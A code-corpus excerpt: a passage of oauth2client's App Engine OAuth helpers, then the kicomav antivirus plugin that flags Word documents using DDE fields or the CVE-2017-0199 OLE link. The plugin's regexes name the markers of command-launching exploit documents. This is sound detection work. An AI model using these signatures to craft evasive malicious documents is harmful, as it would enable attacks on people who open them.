"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credentials = None
if self._cache:
json = self._cache.get(self._key_name)
if json:
credentials = Credentials.new_from_json(json)
if credentials is None:
entity = self._get_entity()
if entity is not None:
credentials = getattr(entity, self._property_name)
if self._cache:
self._cache.set(self._key_name, credentials.to_json())
if credentials and hasattr(credentials, 'set_store'):
credentials.set_store(self)
return credentials
def locked_put(self, credentials):
"""Write a Credentials to the datastore.
Args:
credentials: Credentials, the credentials to store.
"""
entity = self._model.get_or_insert(self._key_name)
setattr(entity, self._property_name, credentials)
entity.put()
if self._cache:
self._cache.set(self._key_name, credentials.to_json())
def locked_delete(self):
"""Delete Credential from datastore."""
if self._cache:
self._cache.delete(self._key_name)
self._delete_entity()
class CredentialsModel(db.Model):
"""Storage for OAuth 2.0 Credentials
Storage of the model is keyed by the user.user_id().
"""
credentials = CredentialsProperty()
if ndb is not None:
class CredentialsNDBModel(ndb.Model):
"""NDB Model for storage of OAuth 2.0 Credentials
Since this model uses the same kind as CredentialsModel and has a property
which can serialize and deserialize Credentials correctly, it can be used
interchangeably with a CredentialsModel to access, insert and delete the
same entities. This simply provides an NDB model for interacting with the
same data the DB model interacts with.
Storage of the model is keyed by the user.user_id().
"""
credentials = CredentialsNDBProperty()
@classmethod
def _get_kind(cls):
"""Return the kind name for this class."""
return 'CredentialsModel'
def _build_state_value(request_handler, user):
"""Composes the value for the 'state' parameter.
Packs the current request URI and an XSRF token into an opaque string that
can be passed to the authentication server via the 'state' parameter.
Args:
request_handler: webapp.RequestHandler, The request.
user: google.appengine.api.users.User, The current user.
Returns:
The state value as a string.
"""
uri = request_handler.request.url
token = xsrfutil.generate_token(xsrf_secret_key(), user.user_id(),
action_id=str(uri))
return uri + ':' + token
def _parse_state_value(state, user):
"""Parse the value of the 'state' parameter.
Parses the value and validates the XSRF token in the state parameter.
Args:
state: string, The value of the state parameter.
user: google.appengine.api.users.User, The current user.
Raises:
InvalidXsrfTokenError: if the XSRF token is invalid.
Returns:
The redirect URI.
"""
uri, token = state.rsplit(':', 1)
if not xsrfutil.validate_token(xsrf_secret_key(), token, user.user_id(),
action_id=uri):
raise InvalidXsrfTokenError()
return uri
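# Illustrative round trip (URI and token values invented): _build_state_value
# packs the request URI and an XSRF token as '<uri>:<token>', and
# _parse_state_value validates the token and returns the URI.
#
#   state = _build_state_value(request_handler, user)
#   # e.g. 'https://app.example.com/page:AbC123...'
#   redirect_uri = _parse_state_value(state, user)
#   # -> 'https://app.example.com/page'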
class OAuth2Decorator(object):
"""Utility for making OAuth 2.0 easier.
Instantiate and then use with oauth_required or oauth_aware
as decorators on webapp.RequestHandler methods.
Example:
decorator = OAuth2Decorator(
client_id='837...ent.com',
client_secret='Qh...wwI',
scope='https://www.googleapis.com/auth/plus')
class MainHandler(webapp.RequestHandler):
@decorator.oauth_required
def get(self):
http = decorator.http()
# http is authorized with the user's Credentials and can be used
# in API calls
"""
def set_credentials(self, credentials):
self._tls.credentials = credentials
def get_credentials(self):
"""A thread local Credentials object.
Returns:
A client.Credentials object, or None if credentials hasn't been set in
this thread yet, which may happen when calling has_credentials inside
oauth_aware.
"""
return getattr(self._tls, 'credentials', None)
credentials = property(get_credentials, set_credentials)
def set_flow(self, flow):
self._tls.flow = flow
def get_flow(self):
"""A thread local Flow object.
Returns:
A credentials.Flow object, or None if the flow hasn't been set in this
thread yet, which happens in _create_flow() since Flows are created
lazily.
"""
return getattr(self._tls, 'flow', None)
flow = property(get_flow, set_flow)
@util.positional(4)
def __init__(self, client_id, client_secret, scope,
auth_uri=GOOGLE_AUTH_URI,
token_uri=GOOGLE_TOKEN_URI,
revoke_uri=GOOGLE_REVOKE_URI,
user_agent=None,
message=None,
callback_path='/oauth2callback',
token_response_param=None,
_storage_class=StorageByKeyName,
_credentials_class=CredentialsModel,
_credentials_property_name='credentials',
**kwargs):
"""Constructor for OAuth2Decorator
Args:
client_id: string, client identifier.
client_secret: string client secret.
scope: string or iterable of strings, scope(s) of the credentials being
requested.
auth_uri: string, URI for authorization endpoint. For convenience
defaults to Google's endpoints but any OAuth 2.0 provider can be used.
token_uri: string, URI for token endpoint. For convenience
defaults to Google's endpoints but any OAuth 2.0 provider can be used.
revoke_uri: string, URI for revoke endpoint. For convenience
defaults to Google's endpoints but any OAuth 2.0 provider can be used.
user_agent: string, User agent of your application, default to None.
message: Message to display if there are problems with the OAuth 2.0
configuration. The message may contain HTML and will be presented on the
web interface for any method that uses the decorator.
callback_path: string, The absolute path to use as the callback URI. Note
that this must match up with the URI given when registering the
application in the APIs Console.
token_response_param: string. If provided, the full JSON response
to the access token request will be encoded and included in this query
parameter in the callback URI. This is useful with providers (e.g.
wordpress.com) that include extra fields that the client may want.
_storage_class: "Protected" keyword argument not typically provided to
this constructor. A storage class to aid in storing a Credentials object
for a user in the datastore. Defaults to StorageByKeyName.
_credentials_class: "Protected" keyword argument not typically provided to
this constructor. A db or ndb Model class to hold credentials. Defaults
to CredentialsModel.
_credentials_property_name: "Protected" keyword argument not typically
provided to this constructor. A string indicating the name of the field
on the _credentials_class where a Credentials object will be stored.
Defaults to 'credentials'.
**kwargs: dict, Keyword arguments are be passed along as kwargs to the
OAuth2WebServerFlow constructor.
"""
self._tls = threading.local()
self.flow = None
self.credentials = None
self._client_id = client_id
self._client_secret = client_secret
self._scope = util.scopes_to_string(scope)
self._auth_uri = auth_uri
self._token_uri = token_uri
self._revoke_uri = revoke_uri
self._user_agent = user_agent
self._kwargs = kwargs
self._message = message
self._in_error = False
self._callback_path = callback_path
self._token_response_param = token_response_param
self._storage_class = _storage_class
self._credentials_class = _credentials_class
self._credentials_property_name = _credentials_property_name
def _display_error_message(self, request_handler):
request_handler.response.out.write('<html><body>')
request_handler.response.out.write(_safe_html(self._message))
request_handler.response.out.write('</body></html>')
def oauth_required(self, method):
"""Decorator that starts the OAuth 2.0 dance.
Starts the OAuth dance for the logged in user if they haven't already
granted access for this application.
Args:
method: callable, to be decorated method of a webapp.RequestHandler
instance.
"""
def check_oauth(request_handler, *args, **kwargs):
if self._in_error:
self._display_error_message(request_handler)
return
user = users.get_current_user()
# Don't use @login_decorator as this could be used in a POST request.
if not user:
request_handler.redirect(users.create_login_url(
request_handler.request.uri))
return
self._create_flow(request_handler)
# Store the request URI in 'state' so we can use it later
self.flow.params['state'] = _build_state_value(request_handler, user)
self.credentials = self._storage_class(
self._credentials_class, None,
self._credentials_property_name, user=user).get()
if not self.has_credentials():
return request_handler.redirect(self.authorize_url())
try:
resp = method(request_handler, *args, **kwargs)
except AccessTokenRefreshError:
return request_handler.redirect(self.authorize_url())
finally:
self.credentials = None
return resp
return check_oauth
def _create_flow(self, request_handler):
"""Create the Flow object.
The Flow is calculated lazily since we don't know where this app is
running until it receives a request, at which point redirect_uri can be
calculated and then the Flow object can be constructed.
Args:
request_handler: webapp.RequestHandler, the request handler.
"""
if self.flow is None:
redirect_uri = request_handler.request.relative_url(
self._callback_path) # Usually /oauth2callback
self.flow = OAuth2WebServerFlow(self._client_id, self._client_secret,
self._scope, redirect_uri=redirect_uri,
user_agent=self._user_agent,
auth_uri=self._auth_uri,
token_uri=self._token_uri,
revoke_uri=self._revoke_uri,
**self._kwargs)
def oauth_aware(self, method):
"""Decorator that sets up for OAuth 2.0 dance, but doesn't do it.
Does all the setup for the OAuth dance, but doesn't initiate it.
This decorator is useful if you want to create a page that knows
whether or not the user has granted access to this application.
From within a method decorated with @oauth_aware the has_credentials()
and authorize_url() methods can be called.
Args:
method: callable, to be decorated method of a webapp.RequestHandler
instance.
"""
def setup_oauth(request_handler, *args, **kwargs):
if self._in_error:
self._display_error_message(request_handler)
return
user = users.get_current_user()
# Don't use @login_decorator as this could be used in a POST request.
if not user:
request_handler.redirect(users.create_login_url(
request_handler.request.uri))
return
self._create_flow(request_handler)
self.flow.params['state'] = _build_state_value(request_handler, user)
self.credentials = self._storage_class(
self._credentials_class, None,
self._credentials_property_name, user=user).get()
try:
resp = method(request_handler, *args, **kwargs)
finally:
self.credentials = None
return resp
return setup_oauth
def has_credentials(self):
"""True if for the logged in user there are valid access Credentials.
Must only be called from with a webapp.RequestHandler subclassed method
that had been decorated with either @oauth_required or @oauth_aware.
"""
return self.credentials is not None and not self.credentials.invalid
def authorize_url(self):
"""Returns the URL to start the OAuth dance.
Must only be called from with a webapp.RequestHandler subclassed method
that had been decorated with either @oauth_required or @oauth_aware.
"""
url = self.flow.step1_get_authorize_url()
return str(url)
def http(self):
"""Returns an authorized http instance.
Must only be called from within an @oauth_required decorated method, or
from within an @oauth_aware decorated method where has_credentials()
returns True.
"""
return self.credentials.authorize(httplib2.Http())
@property
def callback_path(self):
"""The absolute path where the callback will occur.
Note this is the absolute path, not the absolute URI, that will be
calculated by the decorator at runtime. See callback_handler() for how this
should be used.
Returns:
The callback path as a string.
"""
return self._callback_path
def callback_handler(self):
"""RequestHandler for the OAuth 2.0 redirect callback.
Usage:
app = webapp.WSGIApplication([
('/index', MyIndexHandler),
...,
(decorator.callback_path, decorator.callback_handler())
])
Returns:
A webapp.RequestHandler that handles the redirect back from the
server during the OAuth 2.0 dance.
"""
decorator = self
class OAuth2Handler(webapp.RequestHandler):
"""Handler for the redirect_uri of the OAuth 2.0 dance."""
@login_required
def get(self):
error = self.request.get('error')
if error:
errormsg = self.request.get('error_description', error)
self.response.out.write(
'The authorization request failed: %s' % _safe_html(errormsg))
else:
user = users.get_current_user()
decorator._create_flow(self)
credentials = decorator.flow.step2_exchange(self.request.params)
decorator._storage_class(
decorator._credentials_class, None,
decorator._credentials_property_name, user=user).put(credentials)
redirect_uri = _parse_state_value(str(self.request.get('state')),
user)
if decorator._token_response_param and credentials.token_response:
resp_json = simplejson.dumps(credentials.token_response)
redirect_uri = util._add_query_parameter(
redirect_uri, decorator._token_response_param, resp_json)
self.redirect(redirect_uri)
return OAuth2Handler
def callback_application(self):
"""WSGI application for handling the OAuth 2.0 redirect callback.
If you need finer grained control use `callback_handler` which returns just
the webapp.RequestHandler.
Returns:
A webapp.WSGIApplication that handles the redirect back from the
server during the OAuth 2.0 dance.
"""
return webapp.WSGIApplication([
(self.callback_path, self.callback_handler())
])
class OAuth2DecoratorFromClientSecrets(OAuth2Decorator):
"""An OAuth2Decorator that builds from a clientsecrets file.
Uses a clientsecrets file as the source for all the information when
constructing an OAuth2Decorator.
Example:
decorator = OAuth2DecoratorFromClientSecrets(
os.path.join(os.path.dirname(__file__), 'client_secrets.json')
scope='https://www.googleapis.com/auth/plus')
class MainHandler(webapp.RequestHandler):
@decorator.oauth_required
def get(self):
http = decorator.http()
# http is authorized with the user's Credentials and can be used
# in API calls
"""
@util.positional(3)
def __init__(self, filename, scope, message=None, cache=None):
"""Constructor
Args:
filename: string, File name of client secrets.
scope: string or iterable of strings, scope(s) of the credentials being
requested.
message: string, A friendly string to display to the user if the
clientsecrets file is missing or invalid. The message may contain HTML
and will be presented on the web interface for any method that uses the
decorator.
cache: An optional cache service client that implements get() and set()
methods. See clientsecrets.loadfile() for details.
"""
client_type, client_info = clientsecrets.loadfile(filename, cache=cache)
if client_type not in [
clientsecrets.TYPE_WEB, clientsecrets.TYPE_INSTALLED]:
raise InvalidClientSecretsError(
'OAuth2Decorator doesn\'t support this OAuth 2.0 flow.')
constructor_kwargs = {
'auth_uri': client_info['auth_uri'],
'token_uri': client_info['token_uri'],
'message': message,
}
revoke_uri = client_info.get('revoke_uri')
if revoke_uri is not None:
constructor_kwargs['revoke_uri'] = revoke_uri
super(OAuth2DecoratorFromClientSecrets, self).__init__(
client_info['client_id'], client_info['client_secret'],
scope, **constructor_kwargs)
if message is not None:
self._message = message
else:
self._message = 'Please configure your application for OAuth 2.0.'
@util.positional(2)
def oauth2decorator_from_clientsecrets(filename, scope,
message=None, cache=None):
"""Creates an OAuth2Decorator populated from a clientsecrets file.
Args:
filename: string, File name of client secrets.
scope: string or list of strings, scope(s) of the credentials being
requested.
message: string, A friendly string to display to the user if the
clientsecrets file is missing or invalid. The message may contain HTML and
will be presented on the web interface for any method that uses the
decorator.
cache: An optional cache service client that implements get() and set()
methods. See clientsecrets.loadfile() for details.
Returns: An OAuth2Decorator
"""
return OAuth2DecoratorFromClientSecrets(filename, scope,
message=message, cache=cache)
|
apache-2.0
|
hanul93/kicomav
|
Engine/plugins/dde.py
|
1
|
8396
|
# -*- coding:utf-8 -*-
# Author: Kei Choi([email protected])
import os
import re
import zipfile
import kernel
# -------------------------------------------------------------------------
# Extract the given file name from a zip archive and return its data.
# -------------------------------------------------------------------------
def get_zip_data(zip_name, filename):
data = None
try:
zfile = zipfile.ZipFile(zip_name) # open the zip file
names = zfile.namelist()
for name in names:
if name.lower() == filename:
data = zfile.read(name)
break
zfile.close()
except zipfile.BadZipfile:
pass
return data
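# Hedged usage sketch (the file names are assumptions for illustration):
#   data = get_zip_data('sample.docx', 'word/document.xml')
#   -> bytes of word/document.xml, or None if the entry is missing or the
#      zip is corrupt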
# -------------------------------------------------------------------------
# Check whether the string contains an executable file name.
# -------------------------------------------------------------------------
def is_include_exe(s):
exts = ['.exe', '.cmd', '.vbs']
s = s.lower()
for ext in exts:
if s.find(ext) != -1:
return True
return False
def InstrSub(obj):
text = obj.groups()[0]
off = text.find('QUOTE') # does QUOTE exist?
if off != -1:
t = text[off+5:].strip().split(' ')
text = ''.join([chr(int(x)) for x in t])
return text
# -------------------------------------------------------------------------
# KavMain class
# -------------------------------------------------------------------------
class KavMain:
# ---------------------------------------------------------------------
# init(self, plugins_path)
# Initialize the plugin engine.
# Input : plugins_path - location of the plugin engine
#         verbose      - debug mode (True or False)
# Return: 0 - success, non-zero - failure
# ---------------------------------------------------------------------
def init(self, plugins_path, verbose=False): # initialize the plugin engine
s = r'"begin"(.+?)"end"'
self.p_dde_text = re.compile(s, re.IGNORECASE)
s = r'<w:fldSimple\s+?w:instr=\s*?"(.+?)"\s*>'
self.p_instr = re.compile(s, re.IGNORECASE)
s = r'\bdde(auto)?\b'
self.p_dde = re.compile(s, re.IGNORECASE)
s = r'\\system32\b(.+)\.exe'
self.p_cmd = re.compile(s, re.IGNORECASE)
s = r'\<[\d\D]+?\>'
self.p_tag = re.compile(s)
s = r'\x13\s*dde(auto)?\b[^\x00]+'
self.p_dde2 = re.compile(s, re.IGNORECASE)
return 0 # plugin engine initialized successfully
# ---------------------------------------------------------------------
# uninit(self)
# Shut down the plugin engine.
# Return: 0 - success, non-zero - failure
# ---------------------------------------------------------------------
def uninit(self): # shut down the plugin engine
return 0 # plugin engine shut down successfully
# ---------------------------------------------------------------------
# scan(self, filehandle, filename, fileformat)
# Scan for malicious code.
# Input : filehandle  - file handle
#         filename    - file name
#         fileformat  - file format
#         filename_ex - file name (name inside an archive)
# Return: (malware found, malware name, malware ID, scan result) etc.
# ---------------------------------------------------------------------
def scan(self, filehandle, filename, fileformat, filename_ex): # scan for malware
try:
# Is the pre-analyzed file format an OOXML document?
if 'ff_ooxml' in fileformat:
if fileformat['ff_ooxml'] == 'docx':
# A docx file may contain DDE malicious code
data = get_zip_data(filename, 'word/document.xml')
if data:
if self.__scan_dde_docx(data):
return True, 'Exploit.MSWord.DDE.a', 0, kernel.INFECTED
elif self.__scan_cve_2017_0199_docx(data):
return True, 'Exploit.MSWord.CVE-2017-0199', 0, kernel.INFECTED
elif filename_ex.lower() == 'worddocument':
data = filehandle
if self.__scan_dde_doc(data):
return True, 'Exploit.MSWord.DDE.b', 0, kernel.INFECTED
except IOError:
pass
# Return that no malware was found.
return False, '', -1, kernel.NOT_FOUND
# ---------------------------------------------------------------------
# disinfect(self, filename, malware_id)
# Disinfect malicious code.
# Input : filename   - file name
#         malware_id - ID of the malware to disinfect
# Return: whether the malware was disinfected
# ---------------------------------------------------------------------
def disinfect(self, filename, malware_id): # disinfect malware
try:
# Is the ID received from the scan result 0?
if malware_id == 0:
os.remove(filename) # delete the file
return True # return: disinfection complete
except IOError:
pass
return False # return: disinfection failed
# ---------------------------------------------------------------------
# listvirus(self)
# Return the list of malware that can be detected/disinfected.
# Return: list of malware names
# ---------------------------------------------------------------------
def listvirus(self): # list of detectable malware
vlist = list() # declare the list variable
# Register the names of malware that can be detected/disinfected
vlist.append('Exploit.MSWord.DDE.a')
vlist.append('Exploit.MSWord.DDE.b')
vlist.append('Exploit.MSWord.CVE-2017-0199')
return vlist
# ---------------------------------------------------------------------
# getinfo(self)
# Return key information about the plugin engine (author, version, ...)
# Return: plugin engine info
# ---------------------------------------------------------------------
def getinfo(self): # key information about the plugin engine
info = dict() # declare the dict variable
info['author'] = 'Kei Choi' # author
info['version'] = '1.0' # version
info['title'] = 'DDE Scan Engine' # engine description
info['kmd_name'] = 'dde' # engine file name
info['sig_num'] = len(self.listvirus()) # number of detectable malware
return info
# ---------------------------------------------------------------------
# Detect DDE malicious code.
# ---------------------------------------------------------------------
def __scan_dde_docx(self, data):
# Extract the TEXT region.
texts = self.p_dde_text.findall(data)
if len(texts):
buf = ''
for text in texts:
# Remove the leading begin tag
off = text.find('>')
text = text[off + 1:]
# Remove the trailing end tag
off = text.rfind('<')
text = text[:off]
# Process instr
text = self.p_instr.sub(InstrSub, text)
# Remove all tags
buf += self.p_tag.sub('', text) + '\n'
# print buf
if len(buf):
if self.p_dde.search(buf) and self.p_cmd.search(buf):
return True
return False
def __scan_dde_doc(self, data):
s = self.p_dde2.search(data)
if s:
buf = s.group()
if len(buf):
if self.p_dde.search(buf) and self.p_cmd.search(buf):
return True
return False
# ---------------------------------------------------------------------
# Detect CVE-2017-0199 malicious code.
# ---------------------------------------------------------------------
def __scan_cve_2017_0199_docx(self, data):
if data.find('<o:OLEObject Type="Link" ProgID="Word.Document.8"') != -1:
return True
return False
|
gpl-2.0
|